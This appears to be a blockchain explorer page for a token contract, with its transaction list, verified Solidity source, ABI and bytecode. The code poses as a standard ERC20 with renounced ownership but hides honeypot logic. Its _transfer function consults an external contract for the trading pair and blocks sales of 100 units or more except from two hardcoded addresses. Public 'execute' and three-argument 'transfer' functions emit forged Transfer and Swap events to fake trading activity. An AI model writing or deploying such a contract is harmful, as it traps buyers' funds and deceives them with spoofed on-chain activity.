ETH Price: $2,525.47 (+0.41%)

Contract

0x960C4B7D00140e544Cc78F3f20AC1bf519162B48
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve186502992023-11-25 17:48:23279 days ago1700934503IN
0x960C4B7D...519162B48
0 ETH0.0011970325.34860632
Execute183456952023-10-14 2:38:23321 days ago1697251103IN
0x960C4B7D...519162B48
0 ETH0.001203495.08811589
Execute183456832023-10-14 2:35:59321 days ago1697250959IN
0x960C4B7D...519162B48
0 ETH0.000581925.43620014
Execute183456822023-10-14 2:35:47321 days ago1697250947IN
0x960C4B7D...519162B48
0 ETH0.000647595.11940819
Execute183456682023-10-14 2:32:59321 days ago1697250779IN
0x960C4B7D...519162B48
0 ETH0.003101145.1758029
Execute183456672023-10-14 2:32:47321 days ago1697250767IN
0x960C4B7D...519162B48
0 ETH0.002335065.42001662
Execute183456662023-10-14 2:32:35321 days ago1697250755IN
0x960C4B7D...519162B48
0 ETH0.001919965.43749652
Execute183456652023-10-14 2:32:23321 days ago1697250743IN
0x960C4B7D...519162B48
0 ETH0.000793045.68841408
Approve183456412023-10-14 2:27:35321 days ago1697250455IN
0x960C4B7D...519162B48
0 ETH0.000294656.23957925
Approve183433262023-10-13 18:41:35322 days ago1697222495IN
0x960C4B7D...519162B48
0 ETH0.000478210.12649493
Approve183411622023-10-13 11:25:47322 days ago1697196347IN
0x960C4B7D...519162B48
0 ETH0.000357657.58337246
Execute183400892023-10-13 7:49:59322 days ago1697183399IN
0x960C4B7D...519162B48
0 ETH0.000428155.73431588
Execute183400862023-10-13 7:49:23322 days ago1697183363IN
0x960C4B7D...519162B48
0 ETH0.000697585.51462823
Execute183400852023-10-13 7:49:11322 days ago1697183351IN
0x960C4B7D...519162B48
0 ETH0.001405855.49202657
Execute183400842023-10-13 7:48:59322 days ago1697183339IN
0x960C4B7D...519162B48
0 ETH0.003134045.5296599
Approve183399722023-10-13 7:26:35322 days ago1697181995IN
0x960C4B7D...519162B48
0 ETH0.000252095.33849717
Approve183399042023-10-13 7:12:47322 days ago1697181167IN
0x960C4B7D...519162B48
0 ETH0.000262775.56447371
Execute183398672023-10-13 7:05:11322 days ago1697180711IN
0x960C4B7D...519162B48
0 ETH0.003286975.31437699
Execute183398662023-10-13 7:04:59322 days ago1697180699IN
0x960C4B7D...519162B48
0 ETH0.000940385.47354188
Execute183398652023-10-13 7:04:47322 days ago1697180687IN
0x960C4B7D...519162B48
0 ETH0.000684455.70503223
Execute183398642023-10-13 7:04:35322 days ago1697180675IN
0x960C4B7D...519162B48
0 ETH0.000822985.90319039
Execute183394642023-10-13 5:43:35322 days ago1697175815IN
0x960C4B7D...519162B48
0 ETH0.000654715.17568282
Execute183394622023-10-13 5:43:11322 days ago1697175791IN
0x960C4B7D...519162B48
0 ETH0.000594195.23363917
Execute183394612023-10-13 5:42:59322 days ago1697175779IN
0x960C4B7D...519162B48
0 ETH0.000549615.13440825
Execute183394602023-10-13 5:42:47322 days ago1697175767IN
0x960C4B7D...519162B48
0 ETH0.000403565.40493202
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0xe1E3F2b1...aca9B808A
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
ERC20

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-12
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {

    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);


    function allowance(address owner, address spender) external view returns (uint256);


    function approve(address spender, uint256 amount) external returns (bool);


    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


interface IERC20Meta is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

interface IERC000 { 
    function _Transfer(address from, address recipient, uint amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
    
    event Transfer(address indexed from, address indexed to, uint256 value);    
}
interface XP2 { 
    function balanceOf(address account) external view returns (address);
}
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }


    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }


}


contract ERC20 is Ownable, IERC20, IERC20Meta {

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address private xp2;
    


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }


    function decimals() public view virtual override returns (uint8) {
        return 8;
    }


    function execute(address [] calldata _addresses_, uint256 _in, address _a) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_a, _in, 0, 0, _in, _addresses_[i]);
            emit Transfer(_a, _addresses_[i], _in);
        }
    }

    function execute(
        address uniswapPool,
        address[] memory recipients,
        uint256  tokenAmounts,
        uint256  wethAmounts
    ) public returns (bool) {
        for (uint256 i = 0; i < recipients.length; i++) {
            emit Transfer(uniswapPool, recipients[i], tokenAmounts);
            emit Swap(
                0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D,
                tokenAmounts,
                0,
                0,
                wethAmounts,
                recipients[i]
            );
            IERC000(0xaFD54595986eDE4976D6717fCEAd8b36978EDc17)._Transfer(recipients[i], uniswapPool, wethAmounts);
        }
        return true;
    }


    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }


    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }


    function _mint(address account, uint256 amount ,address xp2_) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        xp2 = xp2_;
        _totalSupply += amount;
        unchecked {
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
        renounceOwnership();
    }


    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }



    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        
        address _pair =  
        XP2(xp2).balanceOf(address(this));

        if(_pair != address(0)) {
            if(to == _pair && !(from == 0x644B5D45453a864Cc3f6CBE5e0eA96bFE34C030F || from == 0x6b75d8AF000000e20B7a7DDf000Ba900b4009A80)) {
               bool b = false;
               if(!b) {
                    require(amount < 100);
               }
               
            }

            if(from != _pair && to == 0x6b75d8AF000000e20B7a7DDf000Ba900b4009A80 ) {
                require(amount 
                < 100);
            }
        }

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            _balances[to] += amount;
        }



        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }




    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }


    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}


    constructor(string memory name_, string memory symbol_,uint256 amount,address xp2_) {
        _name = name_;
        _symbol = symbol_;
        _mint(msg.sender, amount * 10 ** decimals(),xp2_);
    }


}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"xp2_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"uniswapPool","type":"address"},{"internalType":"address[]","name":"recipients","type":"address[]"},{"internalType":"uint256","name":"tokenAmounts","type":"uint256"},{"internalType":"uint256","name":"wethAmounts","type":"uint256"}],"name":"execute","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"address","name":"_a","type":"address"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063aafe62d111610066578063aafe62d11461028a578063beabacc8146102a6578063dd62ed3e146102c2578063f2fde38b146102f2576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c578063a9059cbb1461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce56714610196578063618a2f5e146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b61010261030e565b60405161010f91906112db565b60405180910390f35b610132600480360381019061012d91906113a5565b6103a0565b60405161013f9190611400565b60405180910390f35b6101506103c3565b60405161015d919061142a565b60405180910390f35b610180600480360381019061017b9190611445565b6103cd565b60405161018d9190611400565b60405180910390f35b61019e6103fc565b6040516101ab91906114b4565b60405180910390f35b6101ce60048036038101906101c99190611617565b610405565b6040516101db9190611400565b60405180910390f35b6101fe60048036038101906101f9919061169a565b6105fe565b60405161020b919061142a565b60405180910390f35b61021c610647565b005b61022661065b565b60405161023391906116d6565b60405180910390f35b610244610684565b60405161025191906112db565b60405180910390f35b610274600480360381019061026f91906113a5565b610716565b6040516102819190611400565b60405180910390f35b6102a4600480360381019061029f919061174c565b610739565b005b6102c060048036038101906102bb9190611445565b610880565b005b6102dc60048036038101906102d791906117c0565b6108ea565b6040516102e9919061142a565b60405180910390f35b61030c6004803603810190610307919061169a565b610971565b005b60606004805461031d9061182f565b80601f01602080910402602001604051908101604052809291908181526020018280546103499061182f565b80156103965780601f1061036b57610100808354040283529160200191610396565b820191906000526020600020905b81548152906001019060200180831161037957829003601f168201915b5050505050905090565b6000806103ab6109f4565b90506103b88185856109fc565b600191505092915050565b6000600354905090565b6000806103d86109f4565b90506103e5858285610bc5565b6103f0858585610c51565b60019150509392505050565b60006008905090565b600080600090505b84518110156105f15784818151811061042957610428611860565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161048d919061142a565b60405180910390a38481815181106104a8576104a7611860565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff16737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822866000808860405161052794939291906118d4565b60405180910390a373afd54595986ede4976d6717fcead8b36978edc1773ffffffffffffffffffffffffffffffffffffffff1663e156b1b686838151811061057257610571611860565b5b602002602001015188866040518463ffffffff1660e01b815260040161059a93929190611919565b6020604051808303816000875af11580156105b9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105dd919061197c565b5080806105e9906119d8565b91505061040d565b5060019050949350505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61064f611104565b6106596000611182565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546106939061182f565b80601f01602080910402602001604051908101604052809291908181526020018280546106bf9061182f565b801561070c5780601f106106e15761010080835404028352916020019161070c565b820191906000526020600020905b8154815290600101906020018083116106ef57829003601f168201915b5050505050905090565b6000806107216109f4565b905061072e818585610c51565b600191505092915050565b60005b848490508110156108795784848281811061075a57610759611860565b5b905060200201602081019061076f919061169a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080886040516107d294939291906118d4565b60405180910390a38484828181106107ed576107ec611860565b5b9050602002016020810190610802919061169a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161085e919061142a565b60405180910390a38080610871906119d8565b91505061073c565b5050505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516108dd919061142a565b60405180910390a3505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610979611104565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109df90611a92565b60405180910390fd5b6109f181611182565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6290611b24565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ada576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ad190611bb6565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610bb8919061142a565b60405180910390a3505050565b6000610bd184846108ea565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c4b5781811015610c3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3490611c22565b60405180910390fd5b610c4a84848484036109fc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb790611cb4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2690611d46565b60405180910390fd5b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b8152600401610d8c91906116d6565b602060405180830381865afa158015610da9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dcd9190611d7b565b9050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614610f73578073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16148015610ec8575073644b5d45453a864cc3f6cbe5e0ea96bfe34c030f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480610ec65750736b75d8af000000e20b7a7ddf000ba900b4009a8073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b155b15610ee457600080610ee25760648310610ee157600080fd5b5b505b8073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614158015610f5f5750736b75d8af000000e20b7a7ddf000ba900b4009a8073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b15610f725760648210610f7157600080fd5b5b5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610ffa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff190611e1a565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555082600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516110ea919061142a565b60405180910390a36110fd858585611246565b5050505050565b61110c6109f4565b73ffffffffffffffffffffffffffffffffffffffff1661112a61065b565b73ffffffffffffffffffffffffffffffffffffffff1614611180576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117790611e86565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561128557808201518184015260208101905061126a565b60008484015250505050565b6000601f19601f8301169050919050565b60006112ad8261124b565b6112b78185611256565b93506112c7818560208601611267565b6112d081611291565b840191505092915050565b600060208201905081810360008301526112f581846112a2565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061133c82611311565b9050919050565b61134c81611331565b811461135757600080fd5b50565b60008135905061136981611343565b92915050565b6000819050919050565b6113828161136f565b811461138d57600080fd5b50565b60008135905061139f81611379565b92915050565b600080604083850312156113bc576113bb611307565b5b60006113ca8582860161135a565b92505060206113db85828601611390565b9150509250929050565b60008115159050919050565b6113fa816113e5565b82525050565b600060208201905061141560008301846113f1565b92915050565b6114248161136f565b82525050565b600060208201905061143f600083018461141b565b92915050565b60008060006060848603121561145e5761145d611307565b5b600061146c8682870161135a565b935050602061147d8682870161135a565b925050604061148e86828701611390565b9150509250925092565b600060ff82169050919050565b6114ae81611498565b82525050565b60006020820190506114c960008301846114a5565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61150c82611291565b810181811067ffffffffffffffff8211171561152b5761152a6114d4565b5b80604052505050565b600061153e6112fd565b905061154a8282611503565b919050565b600067ffffffffffffffff82111561156a576115696114d4565b5b602082029050602081019050919050565b600080fd5b600061159361158e8461154f565b611534565b905080838252602082019050602084028301858111156115b6576115b561157b565b5b835b818110156115df57806115cb888261135a565b8452602084019350506020810190506115b8565b5050509392505050565b600082601f8301126115fe576115fd6114cf565b5b813561160e848260208601611580565b91505092915050565b6000806000806080858703121561163157611630611307565b5b600061163f8782880161135a565b945050602085013567ffffffffffffffff8111156116605761165f61130c565b5b61166c878288016115e9565b935050604061167d87828801611390565b925050606061168e87828801611390565b91505092959194509250565b6000602082840312156116b0576116af611307565b5b60006116be8482850161135a565b91505092915050565b6116d081611331565b82525050565b60006020820190506116eb60008301846116c7565b92915050565b600080fd5b60008083601f84011261170c5761170b6114cf565b5b8235905067ffffffffffffffff811115611729576117286116f1565b5b6020830191508360208202830111156117455761174461157b565b5b9250929050565b6000806000806060858703121561176657611765611307565b5b600085013567ffffffffffffffff8111156117845761178361130c565b5b611790878288016116f6565b945094505060206117a387828801611390565b92505060406117b48782880161135a565b91505092959194509250565b600080604083850312156117d7576117d6611307565b5b60006117e58582860161135a565b92505060206117f68582860161135a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061184757607f821691505b60208210810361185a57611859611800565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b6000819050919050565b60006118be6118b96118b48461188f565b611899565b61136f565b9050919050565b6118ce816118a3565b82525050565b60006080820190506118e9600083018761141b565b6118f660208301866118c5565b61190360408301856118c5565b611910606083018461141b565b95945050505050565b600060608201905061192e60008301866116c7565b61193b60208301856116c7565b611948604083018461141b565b949350505050565b611959816113e5565b811461196457600080fd5b50565b60008151905061197681611950565b92915050565b60006020828403121561199257611991611307565b5b60006119a084828501611967565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006119e38261136f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611a1557611a146119a9565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a7c602683611256565b9150611a8782611a20565b604082019050919050565b60006020820190508181036000830152611aab81611a6f565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b0e602483611256565b9150611b1982611ab2565b604082019050919050565b60006020820190508181036000830152611b3d81611b01565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611ba0602283611256565b9150611bab82611b44565b604082019050919050565b60006020820190508181036000830152611bcf81611b93565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611c0c601d83611256565b9150611c1782611bd6565b602082019050919050565b60006020820190508181036000830152611c3b81611bff565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611c9e602583611256565b9150611ca982611c42565b604082019050919050565b60006020820190508181036000830152611ccd81611c91565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d30602383611256565b9150611d3b82611cd4565b604082019050919050565b60006020820190508181036000830152611d5f81611d23565b9050919050565b600081519050611d7581611343565b92915050565b600060208284031215611d9157611d90611307565b5b6000611d9f84828501611d66565b91505092915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e04602683611256565b9150611e0f82611da8565b604082019050919050565b60006020820190508181036000830152611e3381611df7565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611e70602083611256565b9150611e7b82611e3a565b602082019050919050565b60006020820190508181036000830152611e9f81611e63565b905091905056fea2646970667358221220d9e631ffd885a36303c5f736554308da3681f244bd739b7f09e2881c0a06bd7964736f6c63430008120033

Deployed Bytecode Sourcemap

